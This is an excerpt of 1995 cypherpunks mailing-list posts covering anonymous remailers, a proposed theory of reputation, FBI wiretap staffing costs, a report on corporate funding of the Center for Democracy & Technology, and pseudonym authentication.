      of SSLeay before he goes on a long holiday...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Wed, 22 Nov 1995 01:36:38 +0800
To: "'cypherpunks@toad.com>
Subject: Using anon.remailers
Message-ID: <01BAB7EF.4FB8FC60@king1-02.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	Would someone point me to where I can read about how to use
the cypherpunk and mixmaster type of anon.remailers?
	Thanks, 
	Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 22 Nov 1995 06:41:33 +0800
To: cypherpunks@toad.com
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <199511210028.TAA15346@jekyll.piermont.com>
Message-ID: <9511210055.AA29106@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Er, Newt was the one who railed against the Exon censorship bill, and
>who's said in public that clipper is unrealistic.

And where does that get us? Did Newt stop the Exon bill in its tracks?
Did he do anything to stop the wiretap bill?

If Newt is all stewed up then how come there isn't a provision in his
budget bill to force these laws to be dismantled the same way that there
are provisions on just about every other part of his agenda?

Face it, Newt may speak from the heart, but he acts from his pocket.

We haven't put enough into his back pocket to get attention.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 22 Nov 1995 13:43:33 +0800
To: Wei Dai <cypherpunks@toad.com>
Subject: Re: towards a theory of reputation
Message-ID: <199511220523.VAA28300@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:14 PM 11/21/95 -0800, Wei Dai wrote:
> The first step toward a theory of reputation is defining what reputation 
> is.  [...]  If these interactions are mainly economic in nature, 
> then we can represent Alice's reputation of Bob by a graph with 
> the horizontal axis labeled price and the vertical axis labeled 
> expected utility. 

Any attempt to discuss and analyze reputations using
morally neutral language is bound to wind up as boring long
winded meaningless complicated word salad.

You will wind up in the same place as the behaviorists did,
going in ever diminishing epistemological circles until you
vanish into the whichness of why and the whyness of which.

Some things, for example reputations, behavior, or the 
principle of mathematical induction, necessarily involve 
concepts that are philosophically problematical.   Any attempt
to discuss these things while avoiding philosophically
problematic concepts invariably degenerates into total fog.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 22 Nov 1995 00:35:33 +0800
To: cypherpunks@toad.com
Subject: toolkits?
Message-ID: <199511211555.HAA27530@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


[note cunning copy of Alice type quoting style, and cunning use of
the same remailer as the last in the chain]

On Tue, 21 Nov 1995, Russell Nelson wrote:

> anonymous-remailer@shell.portal.com writes:
> > Alice here ...
> 
> How do we know this for a fact?

We don't.

As an incentive for Alice to generate herself a PGP key, I hereby
place Alice on notice that if she doesn't sign her next post, and
provide a PGP key, I will create one for her, and steal all the
postive (?) reputation that she has developed so far.

You have 24 hours Alice, otherwise a key gets posted to here, and to
the keyservers with your nym on it.

[someone masquerading as]

Alice de 'nonymous ...

[who will soon steal her nym (as an experiment in Nym
misappropriation, and reputation theft from those who don't use
authentication).  Evolution in action :-)]

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 23 Nov 1995 01:05:58 +0800
To: Wei Dai <wjhalv1@PacBell.COM>
Subject: Re: towards a theory of reputation
Message-ID: <199511221621.IAA19163@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>On Mon, 20 Nov 1995, James A. Donald wrote:
>
>> Any attempt to discuss and analyze reputations using
>> morally neutral language is bound to wind up as boring long
>> winded meaningless complicated word salad.

At 12:19 AM 11/22/95 -0800, Wei Dai wrote:
>I don't understand what you mean by this.  Can you give an example to how 
>to discuss reputation (i.e., the concept of reputation, not a particular 
>reputation) using morally non-neutral language?

Under current circumstances, where we have a large oversupply of
free government supplied retributive violence, the most important
from of reputation is "credit rating", which indicates willingness
to pay ones legitimate debts and perform contracts.

Willingness to fulfill ones obligations is not at all the same thing as
willingness to act in a way that improves other peoples utility.

Fulfilling an obligation assumes normative criteria.  Any
attempt to describe credit worthiness in terms of its effect
on the utility of creditors misses the point.  

Before the nineteenth century, when most governments were reluctant
to provide adequate retributive violence, and were more concerned
with collecting taxes than upholding law and order, the most 
important form of reputation was the reputation for being a 
"gentleman" which encompassed both willingness to pay ones 
just debts and "gentle" conduct, gentle conduct meaning that 
you were unlikely to kill or harm people without good reason,
but did not require that you went around performing good works.

Now if someone has a reputation for good workmanship, this might
seem non normative, but such a reputation is a mixture of two 
components:  "X has good quality products" which is not normative
and is a fact rather than a reputation, because it does not involve 
a prediction of future behavior" and "X will fulfill the spirit 
and intention of a contract" which is a reputation, and is normative.

For example although in principle X might have simultaneously have
reputation for good workmanship and a reputation for not paying 
his debts and not delivering on contracts, such a combination 
would seem unusual and surprising.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@conch.aa.msen.com (Lou Poppler)
Date: Wed, 22 Nov 1995 08:35:54 +0800
To: cypherpunks@toad.com
Subject: Re: Mandarins, Lifers, and Talents
In-Reply-To: <v02120d07acd12fd83388@[199.0.65.105]>
Message-ID: <NHeswMz2B8gV083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995 16:02:09 -0500,
rah@shipwright.com (Robert Hettinga) wrote:
} One of my messier theories about the internet is that it was invented by
} mandarins. Now the talents, the people you call pioneers, have moved in,
} and they're much more pragmatic, and have little patience for crystalline
} perfection, because inefficiency and chaos is where they find beauty, joy,
} and all those other nasty imprecise concepts. When thing settle down a bit,
} the lifers will come.  They're trying to do it now, by building sites like
} www.time.com, or buying into sites like www.wired.com.

Waitaminute, I still remember the Old Days. 
I helped run one corner of the MERIT network, back when it only offered
proto-telnet interactive connections to three mainframes total.  
The network ran on PDP-11s lashed crudely to our mainframes and connected 
to each other on 4800 baud leased lines (half-duplex).

Mandarins were involved in the genesis, certainly, both of our little 
college network, and of the military's arpanet.  The mandarins provided
our subsidies, and some of them found ways to use the net in doing their
academic work.  Very many of them ignored us.  Among us paid computer staff,
the mandarins held occasional blue-sky meetings to plot the future and
standards for the future; the lifers went about their business of feeding
hollerith cards to the mainframes; and the talents immediately set about
exploring this orthogonal new quirk of their machine.  All the edges were
rough in the beginning, and for a long time after the beginning.  Network
code arrived in huge inspired chunks from our eccentric talents.  Other
talents, staff and user alike, would go out to play on the network and
find little suggestions for the eccentric talents responsible.

I think the early networks were less than satisfying for the mandarins.
It required arcane mandarin accounting schemes to rationalize our
perpetual defecits, even in a 'funny money' accounting world.
Policies and standards were strained by the sudden accessibility of 
the foreign operations, under alien chains of command.  The networks
were immediately untidy and required compromise from the user.

The biggest contribution from the mandarins, and I mean this with 
all gratitude, is that they chose, again and again, not to shut us down.

ObCrypto: we were still getting the bugs out of rot13 back then.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::   Lou Poppler  <lwp@mail.msen.com>    |    http://www.msen.com/~lwp/   ::
::        * Support The Phil Zimmermann legal defense fund *              ::
::                http://www.netresponse.com/zldf                         ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Wed, 22 Nov 1995 00:27:09 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
In-Reply-To: <199511210955.BAA16150@jobe.shell.portal.com>
Message-ID: <199511211546.JAA04806@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com said:

a> On Mon, 20 Nov 1995 hallam@w3.org wrote:
>> I think it would be better to slap a RICO suit onto the company
>> concerned. It sound to me like an attempt to gain financial advantage
>> through threatening behaviour. Where I come from that means jail
>> time.

a> RICO is very serious stuff.  Criminal prosecution under the terms of
a> the Racketeer-Influenced & Corrupt Organizations Act is reserved for
a> very serious situations indeed.  It's true "rubber hose" stuff.

a> It was intended as a tool for use against mobsters, but US attorneys
a> have used it against white-collar criminals.  I think, you'd have to
a> have strong evidence of an ongoing "criminal enterprise", which I
a> don't think you have with junk e-mail.

	Actually, they've started using it against vicious
reversed-black-collar (and non-collared) criminals for daring to
exercise their right under the first amendment to peacably protest.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Wed, 22 Nov 1995 00:27:48 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
In-Reply-To: <199511211219.EAA10354@jobe.shell.portal.com>
Message-ID: <199511211551.JAA04817@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com said:

a> On Tue, 21 Nov 1995, Rich Salz wrote:
>> >RICO is very serious stuff.  Criminal prosecution under the terms of
>> the
>> 
>> Like Operation Rescue?

a> My apologies, I'm sorry but I don't understand this reference.  What
a> does Operation Rescue have to do with the seriousness of RICO?  What
a> is Operation Rescue?

a> I am definitely not an expert on foreign statute.

	They (as in, the government) has used the RICO laws against
Operation Rescue, an anti-abortion/pro-life (pick your term) group for
protesting/picketing abortion clinics and doctors who perform abortions.
If they had prosecuted under statutes which applied to everyone, I
wouldn't have had a problem, but they are going after OR and similar
organizations for using tactics similar to those used by civil rights
protesters in the 60s.  'Course, civil rights is Politically Correct.
Abortion rights is Politically Correct.  Protesting abortion is
Politically Incorrect, therefore illegal.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Wed, 22 Nov 1995 03:13:13 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: Cyberpunk handbook [NOISE]
In-Reply-To: <199511210436.UAA26114@jobe.shell.portal.com>
Message-ID: <9511211827.AA27657@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> You Bay Area people probably know all about this already, but I was
> browsing through the local bookstore yesterday and saw Eric Hughes,
> Cypherpunks co-founder, on the cover of the "Cyberpunk [sic] Handbook",
> a slim satirical volume by the Mondo 2000 people.  The book has more
> attitude than information, though.

Apart from the unfortunate choice of cover model :>, the book is
co-authored by Jude Milhon.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 Nov 1995 03:05:54 +0800
To: cypherpunks@toad.com
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <acd75bfd090210044420@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:05 PM 11/21/95, Peter Wayner wrote:
>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening? Doesn't a court ordered wire tap
>require that people listen in and screen the recordings. Does
>this have to be in real time? I can't remember, but I think
>there is a fairly onerous evidentiary chain required to use this
>technology.
...

The manpower shortage can be solved by moving the listening step offshore,
perhaps to one of the Carribbean islands that processes credit card slips.

Even cheaper would be to subcontract out the listening to the relatively
impoverished, but well-educated and English-trained, former Soviet bloc
nations. For example, Romania or Bulgaria, or even Russia. They may still
have the old listening infrastructure in place, although I hear that Stasi
headquarters in the former DDR is now an acupuncture clinic.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 22 Nov 1995 03:31:56 +0800
To: cypherpunks@toad.com
Subject: toolkits?
Message-ID: <199511211859.KAA20466@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

No, *I* am the real Alice, and I refuse to use PGP signing.

Alice de 'nonymous ...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Wed, 22 Nov 1995 00:34:58 +0800
To: cypherpunks@toad.com
Subject: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02130512acd7941208f9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone ever done the math on the FBI's new wire tapping
proposals and determined whether they'll have enough agents to
do all of the listening? Doesn't a court ordered wire tap
require that people listen in and screen the recordings. Does
this have to be in real time? I can't remember, but I think
there is a fairly onerous evidentiary chain required to use this
technology.

For instance, if 1% of America is on the phone during the peak
hours of the day, then that puts 2.5 million Americans on the
phone or 1.25 million conversations. If the FBI wants access to
1% of that, that is still 12,500 simulataneous conversations.
That would seem to imply 12,500 people to listen to the tapes,
right? Would that take agents off the streets?

12,500 agents would cost $1.2 billion a year if they each cost
about $100,000 in salary and benefits. But we need to account
for vacations, shift work and testifying the trials of the drug
lords who are sent to jail. Let's assume that you only need
1/10th the people to handle the two evening shifts. That gives
you a cost of $1.4 billion before vacations. Adding 40% to cover
vacation and weekends puts you close to $2 billion. Let's round
up.

So it would cost $2 billion just to use the information here.
This leads me to believe that they're thinking of building
automatic voice recognition equiptment in the future. What does
anyone think of the numbers?

-Peter Wayner






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 22 Nov 1995 01:27:22 +0800
To: cypherpunks@toad.com
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02120d02acd7b0dbea42@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening?

Hettinga's Corollary to Gilmore's Law ("Censorship is Damage")

In a geodesic network, one node can't route all the traffic. It will choke.

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 22 Nov 1995 01:29:48 +0800
To: cypherpunks@toad.com
Subject: FW: Electronic Commerce and the Internet (6/96 CACM)
Message-ID: <v02120d03acd7b25b44b5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: Fisher Mark <FisherM@is3.indy.tce.com>
To: www-buyinfo <www-buyinfo@allegra.att.com>
Subject: FW: Electronic Commerce and the Internet (6/96 CACM)
Date: Tue, 21 Nov 95 09:21:00 PST
Encoding: 61 TEXT


>From the net-happenings list...
=========================
From: Gleason Sackman <sackman@plains.nodak.edu>
Date: Mon, 20 Nov 1995 10:36:42 -0600 (CST)
Subject: WWW> CALL FOR PAPERS: Electronic Commerce and the Internet

From: raustin@netcom.com (Rick Austin)
Date: Fri, 10 Nov 1995 03:11:56 GMT

     Call for Papers:


     Interested authors are encouraged to submit manuscripts for feature
     articles on Electronic Commerce and the Internet. Six papers are sought

     for a special feature for the June 1996 issue of the Communications of
     the ACM (CACM). Co-Guest Editors for the feature are Rick Austin and
     Ray Pyle of the Bell Atlantic Internet Services Center.

     Guidelines:
     Articles should be written for a general audience consisting of a
     range of experience and backgrounds, but aimed at the general
     practitioner.

     7000 to 10,000 words
     3 to 5 graphic inserts (optional)


     Topics:

     Internet Security
     Electronic Commerce Security
     Digital Signature
     Digital Cash
     Firewalls and gateways
     MIME and attachments
     Integrated EDI/Internet
     Effectiveness of the Internet for commerce
     Advances in Electronic Commerce
     Etc.

     Schedule:

     Finished manuscripts and Author Bio due December 1, 1995.

     Editors comments back by December 15, 1995

     Photo Ready copy due Jan 10 1996.


     Mail or Email to

     Raymond Pyle
     13100 Columbia Pk E47
     Silver Spring, Md. 20904

     raymond.h.pyle@bell-atl.com
======================================================================
Mark Leighton Fisher                   Thomson Consumer Electronics
fisherm@indy.tce.com                   Indianapolis, IN

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@isappp.got.net>
Date: Wed, 22 Nov 1995 04:17:05 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <199511211948.LAA29791@isappp.got.net>
MIME-Version: 1.0
Content-Type: text/plain


moroni@scranton.com writes:

 >    If you ask me if there is something for them to worry about I have to 
 > in all good conscience say yes , if you ask if there is something for us 
 > to worry about again I have to say yes. I don't know if there is even a 
 > common ground for both sides to work towards because terrorism has grown 
 > to include the homegrown variety .

what are you talking about? there has always been homegrown terrorism.
at various times in the past it has been much more intense than it is
now. read a little bit about the history of the labor movement in this
country (ie, in the united states of america).

josh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 22 Nov 1995 04:24:28 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951121115245.23025A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

Obvious approach probably makes the rest of the protocol useless but...
If you force everything to be signed using keys corresponding to 
certificates issued by a trusted agency, that CA can be used to guarantee 
the inequality. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JWRCLUM@aol.com
Date: Wed, 22 Nov 1995 01:38:32 +0800
To: cypherpunks@toad.com
Subject: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy
Message-ID: <951121120109_29631303@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



---------------------
Forwarded message:
From:	gcook@tigger.jvnc.net (Gordon Cook)
Sender:	med-privacy@essential.org
Reply-to:	gcook@tigger.jvnc.net
To:	med-privacy@essential.org (Multiple recipients of list)
Date: 95-11-20 22:44:48 EST


     The following article appeared in the current issue of
Corporate Crime Reporter (Volume 9, Number 44, November 20, 1995,
page one).  It is redisseminated on the Internet with the 
permission of CCR.

SELF-PROCLAIMED "PUBLIC INTEREST" GROUP  HEAVILY FUNDED BY
COMPUTER, TELECOMMUNICATIONS, DATABANK CORPORATIONS THAT WOULD
BENEFIT FROM "MEDICAL PRIVACY" LEGISLATION GROUP SUPPORTS --
EQUIFAX, TRW, DUNN & BRADSTREET IN THE MIX                                 

     The Center for Democracy & Technology (CDT), a self-
proclaimed "public interest organization," is in fact heavily
funded by large private computer, telecommunications, and
databank corporations.
     Funders of CDT, a two-year old Washington, D.C.-based
advocacy organization, include Dunn & Bradstreet Corp., Equifax
Inc., and TRW Information Services, three large databank
corporations that stand to benefit from federal legislation CDT
actively helped shaped and is shepherding through Congress.
     This year, CDT has received $699,643 from more than 30 large
corporations, including $100,000 from Microsoft, $75,000 from
AT&T, $60,000 from Bell Atlantic, $50,000 from Apple Computer,
$25,000 from IBM, $10,000 from TRW Information Services, $10,000
from Dunn & Bradstreet, $5,000 from Direct Marketing Association,
and $5,000 from Equifax Inc. (For a complete list of CDT's
funders, see At A Glance, page 16)
     At a hearing before the Senate Labor and Human Resources
Committee last week, CDT deputy director Janlori Goldman said
that CDT "strongly supports" legislation, S. 1360, sponsored by
Senators Robert Bennett (R-Utah) and Patrick Leahy (D-Vermont),
because it represents "the most comprehensive and strong privacy
bill the Congress has yet considered in this area."
     But opponents of the bill argue that the legislation is not
a privacy statute at all, but instead is a vehicle that would
legitimize the creation of large computerized databanks of
personal medical information, thus benefitting those companies
like TRW and Equifax that give financial support to CDT. The
legislation would allow for broad, unauthorized searches of those
databanks, opponents claim.
     In an interview, Goldman told Corporate Crime Reporter that
all of CDT's corporate funding is earmarked for other projects
and that none of the corporate funding is supporting her work on
the medical privacy bill.
     "The corporate funding is not related at all, in any way
shape or form to my work on this bill," Goldman said. "The reason
we are doing this bill is that I've worked on privacy issues for
a decade. The most important privacy issue to work on is the
passage of the medical records privacy legislation. That is a
very sincere issue for me."
     "None of the corporate support that CDT gets is related to
my work on this bill," Goldman emphasized. "None. Zippo."
     CDT's executive director, Jerry Berman agreed. "We have no
funding for the medical privacy project -- zero," Berman said.
     But critics of the CDT's position on the legislation were
skeptical.
     "During the Senate hearing this week, Senator Bennett was
angered at the suggestion that S. 1360 was an industry bill,"
said Jamie Love of Ralph Nader's Center for Study of Responsive
Law. "He claimed that he had widely consulted with privacy groups
and patient advocates. CDT's Janlori Goldman was the key person
who decided who was in the loop, and who was not in the loop on
this issue. Groups that were not receptive to the idea of massive
database systems of personal medical records were excluded from
deliberations."
     "To find out that CDT has been funded by companies such as
Equifax, TRW, Dunn & Bradstreet, IBM and the telephone companies
is remarkable, because these are among the groups who have the
most at stake in legitimizing and preserving the current system
of maintaining and managing medical records," Love said. "I think
that Janlori Goldman should have mentioned in her Senate
testimony that CDT was funded by corporations who have an
interest in this issue."
     "If CDT were doing its job, TRW and Equifax wouldn't want to
give it money," Love added.
     Harold Eist, president-elect of the American Psychiatric
Association, said that "any datagathering and large computer
company would clearly benefit from legislation that drives large
amounts of individually identified data about American citizens
into data banks without the knowledge and permission of those
American citizens." 
     "Selling that information would represent a gold mine for
those companies," Eist said.
     "It is not surprising that an organization with a
disingenuous name -- Center for Democracy & Technology -- would
be supporting a bill with a disingenuous name -- The Medical
Records Confidentiality Act," Eist said. "In fact, this bill
represents an effort to give away the privacy of American
citizens without their knowledge."
     "My understanding is that Janlori Goldman was involved in
writing the bill," Eist said. "It seems to me that as a former
civil libertarian, she should know very well that there are
loopholes in that bill regarding protections to privacy that you
could drive a Mack truck through." 
     "Unless people can be assured that their privacy will be
protected, there is little or no chance that they will reveal the
kind of tormented and dark secrets that they have to reveal to
recover from their illnesses," Eist said. "Confidentially is the
sine qua non of medical treatment, and especially if it is
psychiatric medical treatment."
     A driving force behind the effort to derail the
Bennett/Leahy bill is Denise Nagel, a Boston physician who
organized the Coalition for Patient Rights of New England "to
restore confidentiality to the doctor-patient relationship."
     Nagel refused to comment on CDT's funding.
     At the Senate hearing last week, Nagel told the committee "I
have no industry ties."
     Nagel charged that S. 1360 was written "to advance the
interests of certain segments of the computer,
telecommunications, data processing and health-care industries."
     "With this bill they would be able to careen full speed
ahead to develop data networks that will give innumerable people
access to our medical records legally and without our knowledge,"
Nagel said.
     "I am convinced that S. 1360 is not at all primarily
concerned with the confidentiality of medical records," Nagel
told the committee. "It is just the opposite. It talks about
informed consent, but then authorizes the creation of databases
without patient knowledge or consent. It talks about individual
rights, and then allows police broad authority to search
databases directly instead of obtaining a specific record from
the patient's doctor. It talks about civil and criminal
sanctions, and then pre-empts all common law and most existing
and future state statutes. It talks about ensuring personal
privacy with respect to medical records, and then sets a ceiling
rather than a floor on medical confidentiality."

AT A GLANCE: CENTER FOR DEMOCRACY AND TECHNOLOGY FUNDING, 1994-
1995

American Advertising Federation         500.00
America Online, Inc.                 25,000.00
Apple Computer Inc.                  50,000.00
AT&T                                 75,000.00
Bell Atlantic                        60,000.00
Business Software Alliance            6,000.00
Cellular Tellecomm Indust Assn       10,000.00
CompuServ                            30,000.00
Delphi Internet Services Corp        10,000.00
Direct Marketing Association          5,000.00
Dunn & Bradstreet Corp               10,000.00
EMA                                   5,000.00
Equifax Inc.                          5,000.00
John Gilmore                          2,500.00
Hartford Foundation                 153,000.00    
IBM                                  25,000.00
Information Technology Industry       5,000.00
Interactive Digital Software          5,000.00
Lotus                                 6,250.00
MARC                                 80,000.00
MCI Telecommunications               15,000.00
Microsoft                           100,000.00
National Cable Television Assn       15,000.00
Netscape Communications Corp          5,000.00
Newspaper Association of Am           5,000.00
Nynex Government Affairs             25,000.00
Pacific Telesis                      25,000.00
Prodigy Service Company              10,000.00
Software Publishers Assn             10,000.00
Time Warner Inc                       5,000.00
TRW Information Svcs                 10,000.00
US Telephone Association             10,000.00
US West Inc                          10,000.00

Total Funding                        814,020.00

Received 1994                        114,377.00
Received 1995                        699,643.00

Total Funding                        814,020.00


Russell Mokhiber
russell@essential.org
voice: 202/429-6928







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 22 Nov 1995 06:00:34 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: towards a theory of reputation
Message-ID: <Pine.SUN.3.91.951121130450.19018A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Many of the topics discussed on this list are economic in nature.  
Unfortunately cypherpunks haven't attracted the attention of professional 
economists who might be willing to apply their analytic tools to these 
issues.  Reputation is one of these issues that is especially important.  
I'm not an economist, so I hope these ramblings do not discourage real 
economists from tackling reputation as a serious research project.

The first step toward a theory of reputation is defining what reputation 
is.  The definition should correspond closely enough to our common sense
notion of reputation so that our intuitions about it are not completely 
useless.  I think a good definition is this: Alice's reputation of Bob is 
her expectation of the results of future interactions with Bob.  If 
these interactions are mainly economic in nature, then we can represent 
Alice's reputation of Bob by a graph with the horizontal axis labeled 
price and the vertical axis labeled expected utility.  A point (x,y) on 
the graph means that Alice expects to get y utils in a business transaction 
where she pays Bob x dollars.  Given this definition, it is natural to say 
the Bob's reputation is the set of all other people's reputations of Bob.

A reputation system consists of a set of entities, each of whom has a 
reputation and a method by which he changes his reputation of others.  
I believe the most important question for a theory of reputation to answer 
is what is a good method (reputation algorithm) by which a person changes 
his reputation of others.  A good reputation algorithm must serve his 
self-interest; it must not be (too) costly to evaluate; its results must 
be stable; a reputation system where most people use the algorithm must 
be stable (i.e., the reputation system must be an evolutionarily stable 
system).

In a reputation based market, each entity's reputation has three values.  
First is the present value of expected future profits, given the reputation 
(let's call it the operating value).  Note that the entity's reputation 
allows him to make positive economic profits, because it makes him a 
price-maker to some extent.  Second is the profit he could make if he 
threw away his reputation by cheating all of his customers (throw-away 
value).  Third is the expected cost of recreating an equivalent reputation 
if he threw away his current one (replacement cost).

Now it is clear that if a reputation's throw-away value ever exceeds its 
operating value or replacement cost, its owner will, in self-interest, 
throw away his reputation by cheating his customers.  In a stable reputation 
system, this should happen very infrequently.  This property may be 
difficult to achieve, however, because only the reputation's owner knows 
what its values are, and they may fluctuate widely.  For example the 
operating value may suddenly decrease when his competitor announces
a major price cut, or the replacement cost may suddenly decrease when 
he succeeds subverting a respected reputation agency.

One way to answer some of these questions may be to create a model of 
a reputation system with a simple reputation algorithm and a simplified 
market, and determine by analysis or simulation whether it has the 
desirable properties.  I hope someone who has an economist friend can 
persuade him to do this.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLI9Ujl0sXKgdnV5AQECCQQAiHq+s3PfsEOJmk0ng9aETQwHVe5EvrA0
+0wimcO2IGf+Bix8J/bLtAlW2eEcXM90pMvBgv+Q4jTkvI5RvGyuMf5cvOgj6rTz
wj9aCqoltjHm/l1dfoWWCn4VSIU8OAJ6wKN/HRANQ5B56TPOgEkS2EDSM2C3w4m9
BgwcG5rBeA8=
=taTA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 22 Nov 1995 02:51:44 +0800
To: cypherpunks@toad.com
Subject: Proving I'm not Bob.
Message-ID: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I had an idea for an advertising based net-payment scheme that has 
a particular security flaw making it totally untrustworthy unless it is
possible to prove that you are not a particular person (the publisher 
